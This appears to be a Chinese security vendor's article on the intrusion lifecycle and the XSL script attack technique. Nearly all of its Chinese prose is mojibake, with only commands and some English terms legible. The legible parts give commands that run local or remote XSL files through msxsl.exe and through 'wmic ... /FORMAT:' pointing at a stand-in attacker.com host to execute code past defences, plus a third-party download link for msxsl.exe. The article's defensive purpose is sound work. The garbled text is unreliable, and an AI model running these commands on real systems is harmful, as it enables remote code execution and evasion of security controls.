Ìá½»ÐèÇó
*
*

*
*
*
Á¢¼´Ìá½»
µã»÷¡±Á¢¼´Ìá½»¡±£¬±íÃ÷ÎÒÀí½â²¢Í¬Òâ ¡¶»Æ½ð³Ç¿Æ¼¼Òþ˽Ìõ¿î¡·

logo

    ²úÆ·Óë·þÎñ
    ½â¾ö·½°¸
    ¼¼ÊõÖ§³Ö
    ºÏ×÷·¢Õ¹
    ¹ØÓڻƽð³Ç

    ÉêÇëÊÔÓÃ
      ¡¶ÈëÇÖÉúÃüÖÜÆÚϸ·Öʵ¼ùÖ¸ÄÏϵÁС·£ºXSL½Å±¾¹¥»÷
      ·¢²¼Ê±¼ä£º2022-05-20 ÔĶÁ´ÎÊý£º 816 ´Î

      »Æ½ð³Ç¿Æ¼¼ÎªÁ˸üºÃµØ½øÐÐÈëÇÖ¼ì²âºÍ·ÀÓù£¬²ÎÕÕ¸÷Öֻƽð³Ç¹ÙÍøÍþв¿ò¼ÜºÍ×ÔÉíµÄʵ¼ùÓë˼¿¼£¬Ìá³öÁË»ùÓÚÈëÇÖÉúÃüÖÜÆÚµÄ¹¥»÷¹ÜÀíÄ£ÐÍ£¬×÷Ϊ»Æ½ð³ÇÐÂÒ»´ú»Æ½ð³Ç¹ÙÍø¼Ü¹¹µÄÈý´óÖ§ÖùÖ®Ò»¡£

      ÈëÇÖÉúÃüÖÜÆÚv1.0°ÑÈëÇÖ¹ý³Ì»®·ÖΪ7¸ö½×¶Î£ºÌ½Ë÷·¢ÏÖ¡¢ÈëÇֺ͸ÐȾ¡¢Ì½Ë÷¸ÐÖª¡¢´«²¥¡¢³Ö¾Ã»¯¡¢¹¥»÷ºÍÀûÓᢻָ´¡£ÈëÇÖÉúÃüÖÜÆÚv1.0ͬÑùÒÔATT&CK×÷Ϊ»ù±¾Õ½Êõ֪ʶ¿â£¬Æ¥Åäµ½²»Í¬µÄÈëÇֽ׶Ρ£ÐèҪעÒâµÄÊÇ£¬²¢·ÇËùÓеÄÈëÇÖ¶¼»á¾­ÀúÕâ7¸ö½×¶Î£¬Ò²Ã»Óоø¶ÔµÄÏßÐÔ´ÎÐò¡£

      1£©Ì½Ë÷·¢ÏÖ

      ÔÚÕâ¸ö½×¶ÎÖУ¬¹¥»÷Õß»áÏÈËø¶¨¹¥»÷¶ÔÏó£¬È»ºóÀûÓÃijЩ¼¼ÊõÊֶΣ¬¾¡¿ÉÄÜ¶àµØ»ñȡĿ±ê±©Â¶³öÀ´µÄÐÅÏ¢£¬Èçͨ¹ý¶Ë¿ÚɨÃè¡¢Ö¸ÎÆÌ½²âµÈ·½Ê½£¬·¢ÏÖÃô¸Ð¶Ë¿Ú¼°°æ±¾ÐÅÏ¢£¬½ø¶øÑ°ÕÒ¹¥»÷µã£¬ÎªÏÂÒ»²½ÈëÇÖ×ö×¼±¸¡£

      2£©ÈëÇֺ͸ÐȾ

      ÔÚÕâ¸ö½×¶Î£¬¹¥»÷Õß»á¸ù¾Ý¡°Ì½Ë÷·¢ÏÖ¡±½×¶ÎËù·¢ÏÖµÄÖØÒªÐÅÏ¢£¬À´¶ÔÄ¿±ê±©Â¶³öµÄ¹¥»÷Ãæ½øÐй¥»÷³¢ÊÔ£¬ÔÚ¡°Ì½Ë÷·¢ÏÖ¡±½×¶ÎÊÕ¼¯µ½µÄÐÅÏ¢Ô½¶à£¬¹¥»÷¶ÔÏóËù±©Â¶µÄ¹¥»÷ÃæÒ²¾ÍÔ½¶à£¬¹¥»÷¸üÒ׳ɹ¦¡£

      3£©Ì½Ë÷¸ÐÖª

      ¹¥»÷ÕßÔڳɹ¦½øÈëϵͳÄÚ²¿ºó£¬ÓÉÓÚÊÇÊ״νøÈëËùÒÔ»á³öÏÖ¶ÔÄÚ²¿»·¾³²»ÊìϤµÄÇé¿ö£¬Õâʱ¹¥»÷Õߵ͝×÷Ò»°ã»áÊǶԵ±Ç°Ëù´¦»·¾³½øÐÐ̽Ë÷£¬ÃþÇåÄÚ²¿´óÖµÄÍøÂç½á¹¹£¬³£³£°éËæ×ű»ÈëÇÖ±¾»úµÄÃô¸ÐÐÅÏ¢ÊÕ¼¯ÒÔ¼°¶ÔÄÚÍø´óÁ¿µÄ¶Ë¿Ú½øÐÐɨÃ裬ºóÐø¸ù¾Ý¹¥»÷ÕßµÄÄ¿µÄ½øÐÐÏÂÒ»²½²Ù×÷¡£

      4£©´«²¥

      Ôڴ˽׶Σ¬¹¥»÷Õ߸ù¾ÝÉÏÒ»½×¶ÎÔÚÄÚÍøÌ½Ë÷¸ÐÖªÊÕ¼¯µ½µÄÐÅÏ¢£¬Ñ¡ÔñÌØ¶¨µÄ¹¥»÷ÊÖ·¨¡£ÈçÈô·¢ÏÖÄÚ²¿ÊÇÓò»·¾³£¬¹¥»÷Õß¿ÉÄ᳢ܻÊÔÏȹ¥ÆÆÓò¿Ø·þÎñÆ÷£¬ÔÙ´«²¥ÆäËû»úÆ÷¡£ÈôÊǹ¤×÷×é»·¾³£¬¿ÉÄÜ»áÀûÓÃÊÕ¼¯µ½µÄ¶Ë¿ÚºÍ·þÎñÐÅÏ¢£¬Ñ¡ÔñÌØ¶¨Â©¶´½øÐÐÅúÁ¿É¨Ãè¹¥»÷£¬À´¾¡¿ÉÄÜ¶àµØ¼ÌÐø»ñµÃÆäËû¼ÆËã»úµÄ¿ØÖÆÈ¨¡£

      5£©³Ö¾Ã»¯

      ¹¥»÷ÕßÔÚ¶Ô×ʲú½øÐжñÒâ²Ù×÷ºó£¬ÎªÁËÄܹ»¼õÉÙÔÙ´ÎÁ¬½ÓµÄ¹¥»÷³É±¾£¬·½±ãÏ´νøÈ룬»á½øÐС°ÁôºóÃÅ¡±µÄ²Ù×÷£¬³£¼ûµÄºóÃÅÈ磺½¨Á¢¼Æ»®ÈÎÎñ£¬¶¨Ê±Á¬½ÓÔ¶³Ì·þÎñÆ÷£»ÉèÖÿª»úÆô¶¯³ÌÐò£¬ÔÚÿ´Î¿ª»úʱ´¥·¢Ö´ÐÐÌØ¶¨¶ñÒâ³ÌÐò£»Ð½¨ÏµÍ³¹ÜÀíÔ±Õ˺ŵȡ£ÕâÑù±ãÓÚ¹¥»÷ÕßÏ´οìËٵǼ²¢¿ØÖƸÃϵͳ¡£

      6£©¹¥»÷ºÍÀûÓÃ

      ¹¥»÷ÕßÔڴ˽׶αã»á¿ªÊ¼¶ÔÄ¿±ê×ʲú½øÐжñÒâ²Ù×÷£¬°´ÕÕ¹¥»÷ÕßÒâÔ¸£¬¶ÔÄÜÀûÓõÄÊý¾Ý½øÐÐÇÔÈ¡¡¢ÀûÓã»¶Ô²Ù×÷ϵͳ¡¢Ãô¸ÐÎļþ½øÐÐÆÆ»µ¡¢É¾³ý¡£ËùÓеķÀÓùÊֶζ¼Ó¦¸Ã¼«Á¦×èÖ¹¹¥»÷Õß½øÐе½ÕâÒ»½×¶Î¡£

      7£©»Ö¸´

      ¹¥»÷ÕßÔÚÖ´ÐÐËùÓеĹ¥»÷²Ù×÷ʱ£¬ÍùÍù»áÔÚϵͳÉÏÁôÏ´óÁ¿µÄÐÐΪÈÕÖ¾£¬Òò´ËÔÚÕâÒ»½×¶Î£¬¹¥»÷Õß»á¶Ô¼Ç¼×ÔÉíºÛ¼£µÄËùÓÐÈÕÖ¾½øÐд¦Àí£¬»òɾ³ý»ò»ìÏý£¬´Ó¶øÏûÃðÖ¤¾Ý£¬ÌÓ±Ü×·×Ù¡£

      ±¾ÏµÁÐÎÄÕ»ùÓڻƽð³Ç¿Æ¼¼ÈëÇÖÉúÃüÖÜÆÚ1.0¼Ü¹¹£¬Ï¸·Ö¸÷½×¶Î¹¥»÷Õߵij£Óù¥»÷ÊֶΣ¬²¢¶ÔÏà¹Ø¹¥»÷ÊֶεľßÌåʵʩ·½Ê½½øÐÐÖðÒ»ÆÊÎö£¬Îª»Æ½ð³Ç¹ÙÍø·ÀÓù½¨ÉèÌṩÓÐÁ¦ÖªÊ¶²¹³äºÍ·´ÖÆ×¼±¸¡£

      XSL½Å±¾¹¥»÷£¨´«²¥£©

      XSLÈ«³ÆÎªEXtensible Stylesheet Language£¬ÖÐÎÄÃû³ÆÎª¿ÉÀ©Õ¹Ñùʽ±íÓïÑÔ¡£XSLÎļþͨ³£ºÍXML£¨¿ÉÀ©Õ¹±ê¼ÇÓïÑÔ£©ÎļþÒ»ÆðʹÓã¬ÓÃÓÚ´¦ÀíºÍչʾXMLÎļþÖеÄÄÚÈÝ¡£±ÈÈçÏëÌáÈ¡³ö´æ´¢ÔÚXMLÎļþÖеÄÊý¾Ý£¬¿ÉÒÔͨ¹ý±àдXSL½Å±¾À´´¦Àí¡£XSLºÜÁé»î£¬Ö§³ÖÔڽű¾ÖÐʹÓÃC#¡¢VB¡¢JScriptµÈÓïÑÔ¡£

      ´Ó¹¥»÷ÕߵĽǶÈÀ´·ÖÎö£¬µ±¹¥»÷Õßͨ¹ýÔ¶³ÌÃüÁîÖ´ÐЩ¶´¡¢webshellµÈ»ñµÃÒ»¸öÃüÁîÖ´Ðд°¿Úºó£¬Ö±½Ó½øÐжñÒâ´úÂëµÄÖ´ÐпÉÄܻᱻ»Æ½ð³Ç¹ÙÍø·ÀÓù´ëÊ©À¹½Ø¡£Í¨¹ýXSL´¦ÀíXMLÎļþÕâÑùºÏ·¨µÄ¹¦ÄÜ¿ÉÒÔÔÚÒ»¶¨³Ì¶ÈÉÏÈÆ¹ýÏÞÖÆ½øÐжñÒâ´úÂëÖ´ÐС£

      ¸ù¾Ý¹¥»÷ÕßµÄÈëÇÖÁ÷³ÌºÍ²Ù×÷ÊֶΣ¬ÀûÓÃXSL½Å±¾¹¥»÷½øÐй¥»÷ÔÚÈëÇÖ¹ý³ÌµÄ³É¹¦ÈëÇÖÖ®ºó£¬¿ÉÒÔ°ïÖú¹¥»÷ÕßÈÆ¹ýÏÞÖÆ½øÐжñÒâ´úÂëµÄÖ´ÐУ¬´ÓÈëÇÖÉúÃüÖÜÆÚ½Ç¶È·ÖÎö£¬XSL½Å±¾¹¥»÷¿É×÷ÓÃÓÚ´«²¥½×¶Î¡¢¹¥»÷ºÍÀûÓý׶Ρ¢³Ö¾Ã»¯½×¶Î¡£ÔÚ´«²¥½×¶Î£¬¹¥»÷Õßͨ¹ýXSL½Å±¾¹¥»÷£¬Èƹý»Æ½ð³Ç¹ÙÍø·ÀÓùÈí¼þÖ´ÐжñÒâ²Ù×÷¡£

      ´Ó¹¥»÷ÐÐΪÁ´ÌõµÄÉÏÏÂÎÄÀ´¿´£¬Õë¶ÔXSL½Å±¾¹¥»÷µÄÐÐΪÁ´ÌõÊäÈëÊä³öÈçÏ£º

      ÊäÈ룺msxsl.exe¡¢wmic.exe¡¢xmlÎļþ¡¢xslÎļþ¡¢Ö´Ðеĵ÷ÓÃÃüÁî

      Êä³ö£ºÖ´ÐжñÒâ´úÂë¶ÔÓ¦µÄÊä³ö½á¹û

      ¸ù¾Ý²»Í¬¹¥»÷˼·£¬¹¥»÷ÕßÀûÓ÷ÇÓ¦ÓòãЭÒéͨÐŽøÐй¥»÷µÄÊÖ·¨Í¨³£ÓÐ2ÖÖ£º

      1. Í¨¹ýmsxsl.exe³ÌÐò±¾µØ/Ô¶³Ìµ÷ÓÃXSL½Å±¾½øÐй¥»÷

      msxsl.exeÊÇ΢Èí¹Ù·½ÌṩµÄͨÓÃÃüÁîÐÐת»»³ÌÐò£¨Ä¿Ç°Î¢Èí¹Ù·½ÏÂÔØÖÐÐÄÒѾ­²»Ìṩ¸Ã³ÌÐòµÄÏÂÔØ£©£¬ÓÃÓÚͨ¹ýWindowsϵͳµÄXSL´¦ÀíÆ÷À´Ö´ÐÐXSL½Å±¾£¬Õâ¸ö³ÌÐò¿ÉÒÔ±»ÓÃÀ´Ö´ÐÐJScript´úÂë¡£

      ÏÂÔØmsxsl.exe³ÌÐò

      https://www.mypcrun.com/file-info-page/msxsl-exe/

      ±àдxmlÎļþ


      ±àдxslÎļþ

      ±àдxmlÎļþºÍxslÎļþºó·ÅÖÃÔÚ±¾µØ

      ʹÓÃÃüÁîmsxsl.exetest.xml test.xslÖ´Ðб¾µØxslÎļþ£¬³É¹¦µ¯³ö¼ÆËãÆ÷

      ½«xmlÎļþºÍxslÎļþÉÏ´«µ½vps£¬¹¹½¨Á´½Ó

      ʹÓÃÃüÁî

      msxsl.exehttp://attacker.com/test.xml http://attacker.com/test.xslÖ´ÐÐÔ¶³ÌxslÎļþ£¬³É¹¦µ¯³ö¼ÆËãÆ÷

      2. ¹¥»÷»úÉÏÐèÒªÏȰ²×°python-impacket°ü

      WMICÀ©Õ¹WMI£¨Windows ManagementInstrumentation£¬Windows¹ÜÀí¹¤¾ß£©£¬ÌṩÁË´ÓÃüÁîÐнӿںÍÅúÃüÁî½Å±¾Ö´ÐÐϵͳ¹ÜÀíµÄÖ§³Ö¡£¹¥»÷Õßͨ¹ýWMI¿É½øÐÐÔ¶³Ì½»»¥Ö´Ðй¥»÷²Ù×÷¡£

      ʹÓÃÃüÁîwmic processlist /FORMAT:test.xslÖ´Ðб¾µØxslÎļþ£¬³É¹¦µ¯³ö¼ÆËãÆ÷

      ʹÓÃÃüÁîwmic os get/FORMAT:"http://attacker.com/test.xsl¡± Ö´ÐÐÔ¶³ÌxslÎļþ£¬³É¹¦µ¯³ö¼ÆËãÆ÷


      Ãâ·ÑÊÔÓÃ
      ·þÎñÈÈÏß

      ÂíÉÏ×Éѯ

      400-811-3777

      »Øµ½¶¥²¿
      ¡¾ÍøÕ¾µØÍ¼¡¿¡¾sitemap¡¿